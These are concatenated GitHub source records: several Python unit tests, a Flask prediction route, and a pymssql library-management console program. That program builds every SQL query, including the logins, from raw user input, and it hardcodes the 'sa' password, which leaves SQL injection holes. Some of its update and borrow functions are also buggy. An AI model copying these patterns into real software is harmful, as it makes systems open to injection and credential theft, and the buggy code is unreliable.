intercept)'.format(X.shape))\n\tprint('y: {}'.format(y.shape))\n\n\tall_theta = one_vs_all(X, y, 4, 1)\n\n\tprint(all_theta, np.shape(all_theta))\n\n\tscenario = 3\n\tif request.data:\n\t\ttest_x = request.data\n\t\ttest_x = np.array(test_x, dtype=np.float128)\n\t\tnew_x = np.c_[np.ones((test_x.shape[0],1)), test_x]\n\t\tnew_x = np.c_[np.ones((new_x.shape[0],1)), new_x]\n\n\t\tscenario = predict_all(new_x, all_theta)\n\n\treturn jsonify(scenario=scenario)\n\ndef getAccuracy():\n\ty = getY()\n\tX = getX()\n\tX = np.c_[np.ones((X.shape[0],1)), X]\n\n\tall_theta = one_vs_all(X, y, 3, 1) \n\n\ty_pred = predict_all(X, all_theta) \n\tcorrect = [1 if a == b else 0 for (a, b) in zip(y_pred, y)] \n\taccuracy = (sum(map(int, correct)) / float(len(correct))) \n\n\tprint('accuracy = {0}%'.format(accuracy * 100))","repo_name":"karen-ho/scenario-service","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35646744126","text":"import markpickle\r\n\r\n\r\ndef test_simple_bytes():\r\n marks = \"![data](data:image/png;base64,aGVsbG8gd29ybGQ=)\"\r\n config = markpickle.Config()\r\n # config.root = \"Top level heading\"\r\n result = markpickle.loads(marks, config)\r\n assert result == b\"hello world\"\r\n\r\n\r\ndef test_bytes_lists():\r\n list_of_binary = [b\"hello world\", b\"hello universe\"]\r\n config = markpickle.Config()\r\n config.serialize_bytes_mime_type = \"application/octet-stream\"\r\n result = markpickle.dumps(list_of_binary, config)\r\n assert (\r\n result == \"- ![bytes](data:application/octet-stream;base64,aGVsbG8gd29ybGQ=)\\n\"\r\n \"- ![bytes](data:application/octet-stream;base64,aGVsbG8gdW5pdmVyc2U=)\\n\"\r\n )\r\n\r\n\r\ndef test_bytes_dict():\r\n dictionaries_of_binary = {\"animal\": b\"hello world\", \"name\": b\"hello universe\"}\r\n config = markpickle.Config()\r\n config.serialize_bytes_mime_type = \"application/octet-stream\"\r\n result = markpickle.dumps(dictionaries_of_binary, config)\r\n assert result == (\r\n \"# animal\\n\\n\"\r\n \"![bytes](data:application/octet-stream;base64,aGVsbG8gd29ybGQ=)\\n\\n\"\r\n \"# name\\n\\n\"\r\n \"![bytes](data:application/octet-stream;base64,aGVsbG8gdW5pdmVyc2U=)\\n\"\r\n )\r\n","repo_name":"matthewdeanmartin/markpickle","sub_path":"test/test_deserialize/test_bytes.py","file_name":"test_bytes.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"470458609","text":"\"\"\"Unit tests MQTT for Home Assistant covers.\"\"\"\n\nimport asyncio\nfrom asyncio import Task\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Set\nfrom unittest.mock import AsyncMock\n\nimport pytest\nfrom _pytest.logging import LogCaptureFixture # pylint: disable=import-private-name\nfrom aiomqtt import Client\n\nfrom tests.conftest_data import CONFIG_CONTENT\nfrom tests.conftest_data import EXTENSION_HARDWARE_DATA_CONTENT\nfrom tests.conftest_data import HARDWARE_DATA_CONTENT\nfrom unipi_control.config import DEVICE_CLASSES\nfrom unipi_control.integrations.covers import CoverMap\nfrom unipi_control.mqtt.discovery.covers import HassCoversMqttPlugin\nfrom unipi_control.neuron import Neuron\n\n\nclass TestHappyPathHassCoversMqttPlugin:\n @pytest.mark.asyncio()\n @pytest.mark.parametrize(\n \"config_loader\", [(CONFIG_CONTENT, HARDWARE_DATA_CONTENT, EXTENSION_HARDWARE_DATA_CONTENT)], indirect=True\n )\n async def test_init_tasks(self, neuron: Neuron, covers: CoverMap, caplog: LogCaptureFixture) -> None:\n \"\"\"Test MQTT output after initialize Home Assistant covers.\"\"\"\n covers.init()\n mock_mqtt_client: AsyncMock = AsyncMock(spec=Client)\n plugin: HassCoversMqttPlugin = HassCoversMqttPlugin(neuron=neuron, mqtt_client=mock_mqtt_client, covers=covers)\n\n tasks: Set[Task] = set()\n\n await plugin.init_tasks(tasks)\n await asyncio.gather(*tasks)\n\n for task in tasks:\n assert task.done() is True\n\n logs: List[str] = [record.getMessage() for record in caplog.records]\n\n assert (\n \"[MQTT] [homeassistant/cover/mocked_unipi/mocked_blind_topic_name/config] \"\n \"Publishing message: {\"\n '\"name\": \"MOCKED_FRIENDLY_NAME - BLIND\", '\n '\"unique_id\": \"mocked_unipi_mocked_blind_topic_name\", '\n '\"object_id\": \"mocked_blind_topic_name\", '\n '\"device_class\": \"blind\", '\n '\"command_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/set\", '\n '\"state_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/state\", '\n '\"qos\": 2, '\n '\"optimistic\": false, '\n '\"device\": {'\n '\"name\": \"MOCKED UNIPI\", '\n '\"identifiers\": \"mocked_unipi\", '\n '\"model\": \"MOCKED_NAME MOCKED_MODEL\", '\n '\"manufacturer\": \"Unipi technology\", '\n '\"suggested_area\": \"MOCKED AREA\"'\n \"}, \"\n '\"position_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/position\", '\n '\"set_position_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/position/set\", '\n '\"tilt_status_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/tilt\", '\n '\"tilt_command_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/tilt/set\"'\n \"}\" in logs\n )\n assert (\n \"[MQTT] [homeassistant/cover/mocked_unipi/mocked_shutter_topic_name/config] \"\n \"Publishing message: {\"\n '\"name\": \"MOCKED_FRIENDLY_NAME - SHUTTER\", '\n '\"unique_id\": \"mocked_unipi_mocked_shutter_topic_name\", '\n '\"object_id\": \"mocked_shutter_topic_name\", '\n '\"device_class\": \"shutter\", '\n '\"command_topic\": \"mocked_unipi/mocked_shutter_topic_name/cover/shutter/set\", '\n '\"state_topic\": \"mocked_unipi/mocked_shutter_topic_name/cover/shutter/state\", '\n '\"qos\": 2, '\n '\"optimistic\": false, '\n '\"device\": {'\n '\"name\": \"MOCKED UNIPI\", '\n '\"identifiers\": \"mocked_unipi\", '\n '\"model\": \"MOCKED_NAME MOCKED_MODEL\", '\n '\"manufacturer\": \"Unipi technology\", '\n '\"suggested_area\": \"MOCKED AREA\"'\n \"}\"\n \"}\" in logs\n )\n assert len(logs) == 3\n\n @pytest.mark.parametrize(\n (\"config_loader\", \"expected\"),\n [\n (\n (CONFIG_CONTENT, HARDWARE_DATA_CONTENT, EXTENSION_HARDWARE_DATA_CONTENT),\n [\n {\n \"message\": {\n \"name\": \"MOCKED_FRIENDLY_NAME - BLIND\",\n \"unique_id\": \"mocked_unipi_mocked_blind_topic_name\",\n \"object_id\": \"mocked_blind_topic_name\",\n \"device_class\": \"blind\",\n \"command_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/set\",\n \"state_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/state\",\n \"qos\": 2,\n \"optimistic\": False,\n \"device\": {\n \"name\": \"MOCKED UNIPI\",\n \"identifiers\": \"mocked_unipi\",\n \"model\": \"MOCKED_NAME MOCKED_MODEL\",\n \"manufacturer\": \"Unipi technology\",\n \"suggested_area\": \"MOCKED AREA\",\n },\n \"position_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/position\",\n \"set_position_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/position/set\",\n \"tilt_status_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/tilt\",\n \"tilt_command_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/tilt/set\",\n },\n \"topic\": \"homeassistant/cover/mocked_unipi/mocked_blind_topic_name/config\",\n },\n {\n \"message\": {\n \"name\": \"MOCKED_FRIENDLY_NAME - SHUTTER\",\n \"unique_id\": \"mocked_unipi_mocked_shutter_topic_name\",\n \"object_id\": \"mocked_shutter_topic_name\",\n \"device_class\": \"shutter\",\n \"command_topic\": \"mocked_unipi/mocked_shutter_topic_name/cover/shutter/set\",\n \"state_topic\": \"mocked_unipi/mocked_shutter_topic_name/cover/shutter/state\",\n \"qos\": 2,\n \"optimistic\": False,\n \"device\": {\n \"name\": \"MOCKED UNIPI\",\n \"identifiers\": \"mocked_unipi\",\n \"model\": \"MOCKED_NAME MOCKED_MODEL\",\n \"manufacturer\": \"Unipi technology\",\n \"suggested_area\": \"MOCKED AREA\",\n },\n },\n \"topic\": \"homeassistant/cover/mocked_unipi/mocked_shutter_topic_name/config\",\n },\n ],\n ),\n ],\n indirect=[\"config_loader\"],\n )\n def test_discovery_message(self, neuron: Neuron, covers: CoverMap, expected: List[Dict[str, Any]]) -> None:\n \"\"\"Test MQTT topic and message when publish a feature.\"\"\"\n covers.init()\n mock_mqtt_client: AsyncMock = AsyncMock(spec=Client)\n plugin: HassCoversMqttPlugin = HassCoversMqttPlugin(neuron=neuron, mqtt_client=mock_mqtt_client, covers=covers)\n\n for index, cover in enumerate(covers.by_device_classes(DEVICE_CLASSES)):\n topic, message = plugin.hass.get_discovery(cover)\n\n assert message == expected[index][\"message\"]\n assert topic == expected[index][\"topic\"]\n","repo_name":"superbox-dev/unipi-control","sub_path":"tests/unit/mqtt/discovery/test_covers.py","file_name":"test_covers.py","file_ext":"py","file_size_in_byte":7532,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"14485089700","text":"from .telenium_process import TeleniumTestProcess\nfrom .common import skip_screen_checks\nfrom .common import ordered\n\n\nclass TrashMessage(TeleniumTestProcess):\n \"\"\"Trash Screen Functionality Testing\"\"\"\n\n @skip_screen_checks\n @ordered\n def test_delete_trash_message(self):\n \"\"\"Delete Trash message permanently from trash message listing\"\"\"\n # Checking current Screen(Inbox screen)\n self.assert_wait_no_except('//ScreenManager[@current]', timeout=15, value='inbox')\n # Method to open side navbar\n self.open_side_navbar()\n # this is for opening Trash screen\n self.cli.wait_click('//NavigationItem[@text=\\\"Trash\\\"]', timeout=2)\n # Checking Trash Screen\n self.assertExists(\"//ScreenManager[@current=\\\"trash\\\"]\", timeout=5)\n # This is for swiping message to activate delete icon.\n self.cli.wait_drag(\n '//Trash[0]//TwoLineAvatarIconListItem[0]/BoxLayout[1]',\n '//Trash[0]//TwoLineAvatarIconListItem[0]/BoxLayout[2]', 2, timeout=5)\n # Checking the \"trash-can\" is rendered\n self.assertExists(\n \"//MDList[0]/CutsomSwipeToDeleteItem[0]//MDIconButton[@icon~=\\\"trash-can\\\"]\", timeout=2)\n # Delete icon is enabled\n self.cli.setattr('//MDList[0]/CutsomSwipeToDeleteItem[0]//MDIconButton', 'disabled', False)\n # Checking the Dialog popup is closed\n self.assertNotExists('//MDDialog[@open]', timeout=5)\n # Checking the delete icon is rendered and functional\n self.assertExists('//MDList[0]/CutsomSwipeToDeleteItem[0]//MDIconButton[@icon=\\\"trash-can\\\"]', timeout=5)\n # Click on the delete icon to delete the current message\n self.cli.wait_click('//MDList[0]/CutsomSwipeToDeleteItem[0]//MDIconButton[@icon=\\\"trash-can\\\"]', timeout=5)\n # Checking Confirm Popup is Opened\n self.assertExists('//MDDialog[@open]', timeout=5)\n # Checking the popup's 'Yes' button is rendered.\n self.assertExists(\"//MDDialog//MDFlatButton[@text=\\\"Yes\\\"]\", timeout=5)\n # Clicking on 'Yes' Button on Popup to confirm delete.\n self.cli.wait_click('//MDFlatButton[@text=\\\"Yes\\\"]', timeout=5)\n # Checking the Dialog is closed on click \"Yes\" button\n self.assertNotExists('//MDDialog[@open]', timeout=5)\n # Checking the message is rendered on Trash screen\n self.assertExists('//MDList[0]/CutsomSwipeToDeleteItem[0]', timeout=5)\n # Checking Current screen is Trash Screen\n self.assertExists(\"//ScreenManager[@current=\\\"trash\\\"]\", timeout=5)\n","repo_name":"shekhar-cis/kivy_working_mock","sub_path":"PyBitmessage/src/bitmessagekivy/tests/test_trash_message.py","file_name":"test_trash_message.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31549457000","text":"'''\r\n以下代码在MSSQL中运行创建库\r\ncreate database books\r\non primary\r\n(name='books',filename='d:\\books\\books.mdf')\r\nLOG on\r\n(name ='books_log',filename = 'd:\\books\\books_log.ldf')\r\nuse books\r\n\r\ncreate table admin(\r\naid nchar(4) primary key,\r\npw nvarchar(20))\r\n\r\ncreate table book(\r\nbookid nchar(4)primary key,\r\nbookname nvarchar(20),\r\nauthor nvarchar(20),\r\npublisher nvarchar(20),\r\npubdate date,\r\nprice float,\r\nsummary nvarchar(50)\r\nquantity nchar(1))\r\n\r\ncreate table rtype(\r\nrtype nchar(2)primary key ,\r\nrtname nvarchar(20),\r\nrtbooks tinyint,\r\nrtdays tinyint)\r\n\r\ncreate table reader(\r\nrid nchar(4)primary key,\r\nrname nvarchar(20),\r\nrsex nvarchar(4),\r\nrunit nvarchar(20),\r\nrtel nvarchar(13),\r\nrtype nchar(2),\r\nrmoney float,\r\npw nvarchar(20)\r\nforeign key (rtype) references rtype(rtype))\r\n\r\ncreate table borrow(\r\nid int identity(1,1) primary key,\r\nbookid nchar(4),\r\nrid nchar(4),\r\nbdate date,\r\nrdate date,\r\nrm float\r\nforeign key(bookid)references book(bookid),\r\nforeign key(rid)references reader(rid))\r\n'''\r\n\r\nimport os\r\nimport pymssql\r\n\r\ndef createdb():\r\n conn = pymssql.connect(host='.', database='master', user='sa', password='1234')\r\n cur = conn.cursor()\r\n conn.autocommit(True)\r\n sql = '''\r\n create database books\r\n on primary \r\n (name='books',filename='d:\\books\\books.mdf')\r\n LOG on \r\n (name ='books_log',filename = 'd:\\books\\books_log.ldf')\r\n\r\n '''\r\n cur.execute(sql)\r\n print('数据库建立完毕')\r\n\r\ndef first():\r\n print('===图书管理系统===')\r\n conn = pymssql.connect(host='.', database='master', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"select name from sys.databases where name ='books'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n ch = input('第一次启动程序,是否新建数据库(Y/N):')\r\n if ch == 'y' or ch == 'Y':\r\n createdb()\r\n else:\r\n print('退出系统')\r\n os.system('pause')\r\n exit()\r\n\r\ndef adminlogin(): #管理员登录\r\n os.system(\"cls\")\r\n print(\"===管理员登录===\")\r\n id=input(\"请输入管理员编号:\")\r\n pw=input(\"请输入管理员密码:\")\r\n #连接数据库BOOKS\r\n conn=pymssql.connect(host='.',database='BOOKS',user='sa',password='1234')\r\n cur=conn.cursor()\r\n sql=\"SELECT * FROM admin WHERE aid='\"+id+\"' and pw='\"+pw+\"'\"\r\n cur.execute(sql)\r\n data=cur.fetchall()\r\n if len(data)==0:\r\n print(\"编号或密码错误\")\r\n os.system(\"pause\")\r\n else:\r\n adminmain()\r\n conn.close()\r\n\r\ndef adminmain(): #管理员界面\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===图书管理系统(管理员)===\")\r\n print(\"1、借阅管理\")\r\n print(\"2、图书管理\")\r\n print(\"3、读者管理\")\r\n print(\"9、管理员管理\")\r\n print(\"0、退出系统\")\r\n ch=input(\"请选择操作:\")\r\n if ch=='1':\r\n borrowm()\r\n elif ch=='2':\r\n bookm()\r\n elif ch=='3':\r\n readerm()\r\n elif ch=='9':\r\n adminm()\r\n elif ch=='0':\r\n exit()\r\n\r\ndef bookm(): # 图书管理\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===图书管理===\")\r\n print(\"1、添加图书\")\r\n print(\"2、删除图书\")\r\n print(\"3、查询图书\")\r\n print(\"4、修改图书\")\r\n print(\"0、回到上层菜单\")\r\n ch = input(\"请选择操作:\")\r\n if ch == '1':\r\n booki()\r\n elif ch == '2':\r\n bookd()\r\n elif ch == '3':\r\n books()\r\n elif ch == '4':\r\n booku()\r\n elif ch == '0':\r\n break\r\n\r\ndef booki(): # 图书插入\r\n os.system(\"cls\")\r\n print(\"===添加图书===\")\r\n print(\"请输入图书信息:\")\r\n bookid = input(\"图书编号:\")\r\n bookname = input(\"书名:\")\r\n author = input(\"作者:\")\r\n publisher = input(\"出版社:\")\r\n pubdate = input(\"出版日期:\")\r\n price = input(\"价格:\")\r\n summary = input(\"简介:\")\r\n quantity = input(\"是否被借阅:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"INSERT INTO book VALUES('\" + bookid + \\\r\n \"','\" + bookname + \\\r\n \"','\" + author + \\\r\n \"','\" + publisher + \\\r\n \"','\" + pubdate + \\\r\n \"','\" + price + \\\r\n \"','\" + summary + \\\r\n \"','\" + quantity + \\\r\n \"')\"\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"图书添加成功\")\r\n os.system(\"pause\")\r\n\r\ndef bookd(): # 图书删除\r\n os.system(\"cls\")\r\n print(\"===删除图书===\")\r\n print(\"请输入欲删除图书编号:\")\r\n bookid = input(\"图书编号:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该书编号\")\r\n else:\r\n ch = input(\"请确认删除(Y/N):\")\r\n if ch == 'y' or ch == 'Y':\r\n sql = \"DELETE book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n conn.commit()\r\n print(\"图书删除成功\")\r\n conn.close()\r\n os.system(\"pause\")\r\n\r\ndef books(): # 图书查询\r\n os.system(\"cls\")\r\n print(\"===查询图书===\")\r\n print(\"请输入你想查找的图书编号:\")\r\n bookid = input(\"图书编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data)==0:\r\n print(\"没有该书编号\")\r\n else:\r\n sql=\"SELECT * FROM book WHERE bookid='\"+bookid+\"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n print(\"图书查询成功\")\r\n os.system(\"pause\")\r\n\r\ndef booku(): # 图书修改\r\n os.system(\"cls\")\r\n print(\"===修改图书===\")\r\n print(\"请输入你想修改的图书编号:\")\r\n bookid = input(\"图书编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data)==0:\r\n print(\"没有该书编号\")\r\n else:\r\n bookname = input(\"书名:\")\r\n author = input(\"作者:\")\r\n publisher = input(\"出版社:\")\r\n pubdate = input(\"出版日期:\")\r\n price = input(\"价格:\")\r\n summary = input(\"简介:\")\r\n sql=\"UPDATE book SET bookname=bookname+%s,author=author+%s,publisher=publisher+%s,pubdate=pubdate+%s,\\\r\n price=price+%s,summary=summary+%s WHERE bookid='\"+bookid+\"'\" %(bookname,author,publisher,pubdate,price,summary)\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"图书修改成功\")\r\n os.system(\"pause\")\r\n\r\ndef borrowm(): # 借阅管理\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===借阅管理===\")\r\n print(\"1、借阅图书\")\r\n print(\"2、归还图书\")\r\n print(\"0、回到上层菜单\")\r\n ch = input(\"请选择操作:\")\r\n if ch == '1':\r\n borrow_book()\r\n elif ch == '2':\r\n return_book()\r\n elif ch == '0':\r\n break\r\n\r\ndef borrow_book(): # 图书借阅\r\n os.system(\"cls\")\r\n print(\"===借阅图书===\")\r\n print(\"请输入你想借阅的图书编号:\")\r\n bookid = input(\"图书编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该书编号\")\r\n else:\r\n sql = \"SELECT quantity FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n quantity = cur.fetchone()\r\n if quantity == 0:\r\n print(\"此书已被借阅,借阅信息如下:\")\r\n sql = \"SELECT * FROM borrow WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n else:\r\n print(\"请输入借阅者的读者编号:\")\r\n rid = input(\"读者编号\")\r\n date = input(\"借书日期\")\r\n rdate = input(\"归还日期\")\r\n rm = input(\"逾期金额\")\r\n sql = \"INSERT INTO borrow VALUES('\" + bookid + \\\r\n \"','\" + rid + \\\r\n \"','\" + date + \\\r\n \"','\" + rdate + \\\r\n \"','\" + rm + \\\r\n \"')\"\r\n cur.execute(sql)\r\n sql = \"UPDATE book SET quantity=0 WHERE quantity='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n print(\"图书借阅成功\")\r\n os.system(\"pause\")\r\n\r\ndef return_book(): # 图书归还\r\n os.system(\"cls\")\r\n print(\"===归还图书===\")\r\n print(\"请输入你想归还的图书编号:\")\r\n bookid = input(\"图书编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM borrow WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该书编号\")\r\n else:\r\n ch = input(\"请确认归还(Y/N):\")\r\n if ch == 'y' or ch == 'Y':\r\n sql = \"DELETE borrow WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n conn.commit()\r\n print(\"图书归还成功\")\r\n sql = \"UPDATE book SET quantity=1 WHERE quantity='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n os.system(\"pause\")\r\n\r\ndef readerm(): # 读者管理\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===读者管理===\")\r\n print(\"1、添加读者\")\r\n print(\"2、删除读者\")\r\n print(\"3、查询读者\")\r\n print(\"4、修改读者\")\r\n print(\"0、回到上层菜单\")\r\n ch = input(\"请选择操作:\")\r\n if ch == '1':\r\n readeri()\r\n elif ch == '2':\r\n readerd()\r\n elif ch == '3':\r\n readers()\r\n elif ch == '4':\r\n readeru()\r\n elif ch == '0':\r\n break\r\n\r\ndef readeri(): # 读者插入\r\n os.system(\"cls\")\r\n print(\"==读者===\")\r\n print(\"请输入读者信息:\")\r\n rid = input(\"读者编号:\")\r\n rname = input(\"姓名:\")\r\n rsex = input(\"性别:\")\r\n runit = input(\"单位:\")\r\n rtel = input(\"电话:\")\r\n rtype = input(\"类型号:\")\r\n rmoney = input(\"余额:\")\r\n pw = input(\"密码:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"INSERT INTO reader VALUES('\" + rid + \\\r\n \"','\" + rname + \\\r\n \"','\" + rsex + \\\r\n \"','\" + runit + \\\r\n \"','\" + rtel + \\\r\n \"','\" + rtype + \\\r\n \"','\" + rmoney + \\\r\n \"','\" + pw + \\\r\n \"')\"\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"读者添加成功\")\r\n os.system(\"pause\")\r\n\r\ndef readerd(): # 读者删除\r\n os.system(\"cls\")\r\n print(\"===删除读者===\")\r\n print(\"请输入删除读者编号:\")\r\n rid = input(\"读者编号:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT rid FROM reader WHERE rid='\" + rid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该读者编号\")\r\n else:\r\n ch = input(\"请确认删除(Y/N):\")\r\n if ch == 'y' or ch == 'Y':\r\n sql = \"DELETE reader WHERE rid='\" + rid + \"'\"\r\n cur.execute(sql)\r\n conn.commit()\r\n print(\"读者删除成功\")\r\n conn.close()\r\n os.system(\"pause\")\r\n\r\ndef readers(): # 读者查询\r\n os.system(\"cls\")\r\n print(\"===查询读者===\")\r\n print(\"请输入你想查找的读者编号:\")\r\n rid = input(\"读者编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT rid FROM reader WHERE rid='\" + rid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data)==0:\r\n print(\"没有该读者编号\")\r\n else:\r\n sql=\"SELECT * FROM reader WHERE rid='\"+rid+\"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n print(\"读者查询成功\")\r\n os.system(\"pause\")\r\n\r\ndef readeru(): # 读者修改\r\n os.system(\"cls\")\r\n print(\"===修改读者===\")\r\n print(\"请输入你想修改的读者编号:\")\r\n rid = input(\"读者编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT rid FROM reader WHERE rid='\" + rid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data)==0:\r\n print(\"没有该读者编号\")\r\n else:\r\n rname = input(\"姓名:\")\r\n rsex = input(\"性别:\")\r\n runit = input(\"单位:\")\r\n rtel = input(\"电话:\")\r\n rtype = input(\"类型号:\")\r\n rmoney = input(\"余额:\")\r\n pw = input(\"密码:\")\r\n sql=\"UPDATE reader SET rname=rname+%s,rsex=rsex+%s,runit=runit+%s,rtel=rtel+%s,rtype=rtype+%s,\\\r\n rmoney=rmoney+%s,pw=pw+%s WHERE rid='\"+rid+\"'\" %(rname,rsex,runit,rtel,rtype,rmoney,pw)\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"读者修改成功\")\r\n os.system(\"pause\")\r\n\r\ndef adminm(): # 管理员管理\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===管理员管理===\")\r\n print(\"1、添加管理员\")\r\n print(\"2、删除管理员\")\r\n print(\"3、修改管理员\")\r\n print(\"0、回到上层菜单\")\r\n ch = input(\"请选择操作:\")\r\n if ch == '1':\r\n admini()\r\n elif ch == '2':\r\n admind()\r\n elif ch == '3':\r\n adminu()\r\n elif ch == '0':\r\n break\r\n\r\ndef admini(): # 管理员插入\r\n os.system(\"cls\")\r\n print(\"==管理员===\")\r\n print(\"请输入管理员信息:\")\r\n aid = input(\"管理员编号:\")\r\n pw = input(\"密码:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"INSERT INTO admin VALUES('\" + aid + \\\r\n \"','\" + pw + \\\r\n \"')\"\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"管理员添加成功\")\r\n os.system(\"pause\")\r\n\r\ndef admind(): # 管理员删除\r\n os.system(\"cls\")\r\n print(\"===删除管理员===\")\r\n print(\"请输入删除管理员编号:\")\r\n aid = input(\"管理员编号:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT aid FROM admin WHERE aid='\" + aid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该管理员编号\")\r\n else:\r\n ch = input(\"请确认删除(Y/N):\")\r\n if ch == 'y' or ch == 'Y':\r\n sql = \"DELETE admin WHERE aid='\" + aid + \"'\"\r\n cur.execute(sql)\r\n conn.commit()\r\n print(\"管理员删除成功\")\r\n conn.close()\r\n os.system(\"pause\")\r\n\r\ndef adminu(): # 管理员修改\r\n os.system(\"cls\")\r\n print(\"===修改管理员===\")\r\n print(\"请输入你想修改的管理员编号:\")\r\n aid = input(\"管理员编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT aid FROM admin WHERE aid='\" + aid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data)==0:\r\n print(\"没有该管理员编号\")\r\n else:\r\n pw = input(\"密码:\")\r\n sql=\"UPDATE admin SET pw=pw+%s WHERE aid='\"+aid+\"'\" %(pw)\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"管理员修改成功\")\r\n os.system(\"pause\")\r\n\r\ndef readerlogin(): #读者登录\r\n os.system(\"cls\")\r\n print(\"===读者登录===\")\r\n global uniqueid\r\n uniqueid = input(\"请输入读者编号:\")\r\n pw = input(\"请输入读者密码:\")\r\n # 连接数据库BOOKS\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT * FROM reader WHERE rid='\" + uniqueid + \"' and pw='\" + pw + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"编号或密码错误\")\r\n os.system(\"pause\")\r\n else:\r\n readermain()\r\n conn.close()\r\n\r\ndef readermain(): # 读者界面\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===图书管理系统(读者)===\")\r\n print(\"1、图书查询\")\r\n print(\"2、借阅查询\")\r\n print(\"0、退出系统\")\r\n ch = input(\"请选择操作:\")\r\n if ch == '1':\r\n booksearch()\r\n elif ch == '2':\r\n borrowsearch()\r\n elif ch == '0':\r\n exit()\r\n\r\ndef booksearch(): # 查询图书界面\r\n os.system(\"cls\")\r\n print(\"===查询图书===\")\r\n 